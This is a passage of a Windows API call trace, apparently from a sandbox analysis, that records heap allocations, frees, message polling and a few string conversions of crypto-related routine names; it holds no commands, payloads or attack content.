HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0232.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0232.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0232.472] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0232.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0232.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0232.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0232.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0232.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0232.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0232.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0232.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0232.472] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.473] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0232.473] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0232.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0232.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0232.473] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04070 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0232.473] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0232.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04070 | out: hHeap=0x970000) returned 1 [0232.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0232.473] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0232.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0232.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0232.473] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0232.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0232.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0232.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0232.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0232.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0232.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0232.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0232.474] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0232.474] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0232.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0232.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04498 [0232.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0232.474] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0232.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0232.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0232.475] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0232.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0232.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0232.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0232.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0232.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0232.475] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0232.475] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0232.475] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0232.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0232.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0232.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0232.476] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0232.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0232.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0232.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0232.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0232.476] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0232.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0232.477] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0232.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0232.477] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0232.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0232.477] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0232.478] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0232.478] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0232.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0232.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ed8 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0232.478] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0232.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0232.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0232.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0232.478] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0232.478] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0232.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0232.479] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0232.479] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0232.479] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0232.479] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0232.479] 